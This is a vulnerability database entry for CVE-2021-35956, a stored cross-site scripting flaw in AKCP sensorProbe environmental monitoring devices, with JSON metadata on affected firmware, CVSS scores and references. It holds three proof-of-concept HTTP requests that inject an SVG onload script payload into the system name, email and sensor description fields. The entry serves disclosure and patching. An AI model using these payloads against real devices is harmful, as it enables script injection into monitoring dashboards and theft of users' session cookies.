VAR-202106-1093
Vulnerability from variot - Updated: 2023-12-18 13:22Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials.
1) Stored Cross-Site Scripting via System Settings
POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
_SA01=System+Namer&_SA02=RDC&_SA03=Namexss>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
2) Stored Cross-Site Scripting via Email Settings
POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=xxss>&_PS05_4=&sbt2=Save
3) Stored Cross-Site Scripting via Sensor Description
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close
_WT00-IX=">xss>&_WT03-IX=2&sbt1=Save
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202106-1093",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "sensorprobe8-x60",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe2",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe8-x20",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe4",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe8",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe \u003csp480-20210624",
"scope": null,
"trust": 0.6,
"vendor": "akcp",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:akcp:sensorprobe2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "sp480-20210624",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:akcp:sensorprobe2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:akcp:sensorprobe4_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "sp480-20210624",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:akcp:sensorprobe4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:akcp:sensorprobe8_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "sp480-20210624",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:akcp:sensorprobe8:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:akcp:sensorprobe8-x20_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "sp480-20210624",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:akcp:sensorprobe8-x20:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:akcp:sensorprobe8-x60_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "sp480-20210624",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:akcp:sensorprobe8-x60:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Tyler Butler",
"sources": [
{
"db": "PACKETSTORM",
"id": "163343"
}
],
"trust": 0.1
},
"cve": "CVE-2021-35956",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2021-46654",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2021-35956",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "LOW",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-35956",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2021-46654",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202106-1985",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-35956",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials. \n\n\n1) Stored Cross-Site Scripting via System Settings \n\nPOST /system?time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 114\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/system?time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n_SA01=System+Namer\u0026_SA02=RDC\u0026_SA03=Name\u003csvg/onload=alert`xss`\u003e\u0026_SA04=1\u0026_SA06=0\u0026_SA36=0\u0026_SA37=0\u0026sbt1=Save\n\n2) Stored Cross-Site Scripting via Email Settings \n\nPOST /mail?time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 162\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/mail?time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n\n_PS03=test@test.com\u0026_PS04=test@test.com\u0026_PS05_0=test@test.com\u0026_PS05_1=test@test.comr\u0026_PS05_3=\u003csvg/onload=alert`xxss`\u003e\u0026_PS05_4=\u0026sbt2=Save\n\n3) Stored Cross-Site Scripting via Sensor Description\n\nPOST /senswatr?index=0\u0026time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 55\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/senswatr?index=0\u0026time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: CPCookie=sensors=400\nConnection: close\n\n_WT00-IX=\"\u003e\u003csvg/onload=alert`xss`\u003e\u0026_WT03-IX=2\u0026sbt1=Save\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-35956"
},
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-35956",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "163343",
"trust": 1.8
},
{
"db": "CNVD",
"id": "CNVD-2021-46654",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "50080",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-35956",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
]
},
"id": "VAR-202106-1093",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
}
]
},
"last_update_date": "2023-12-18T13:22:50.963000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CVE-2021-35956",
"trust": 0.1,
"url": "https://github.com/tcbutler320/cve-2021-35956 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-35956"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://tbutler.org/2021/06/28/cve-2021-35956"
},
{
"trust": 1.7,
"url": "https://www.akcp.com/support-center/customer-login/sensor-probe-firmware-changelog/"
},
{
"trust": 1.7,
"url": "http://www.akcp.in.th/downloads/firmwares/sp480-20210624.zip"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/163343/akcp-sensorprobe-spx476-cross-site-scripting.html"
},
{
"trust": 1.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35956"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50080"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://github.com/tcbutler320/cve-2021-35956"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://[target]/mail?time=32e004c941f912"
},
{
"trust": 0.1,
"url": "http://[target]/senswatr?index=0\u0026time=32e004c941f912"
},
{
"trust": 0.1,
"url": "http://[target]"
},
{
"trust": 0.1,
"url": "https://www.akcp.com/"
},
{
"trust": 0.1,
"url": "https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/"
},
{
"trust": 0.1,
"url": "http://[target]/system?time=32e004c941f912"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"date": "2021-06-30T00:00:00",
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"date": "2021-07-02T15:30:25",
"db": "PACKETSTORM",
"id": "163343"
},
{
"date": "2021-06-30T12:15:07.683000",
"db": "NVD",
"id": "CVE-2021-35956"
},
{
"date": "2021-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"date": "2021-07-06T00:00:00",
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"date": "2021-07-06T13:20:33.377000",
"db": "NVD",
"id": "CVE-2021-35956"
},
{
"date": "2021-07-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AKCP sensorProbe cross-site scripting vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…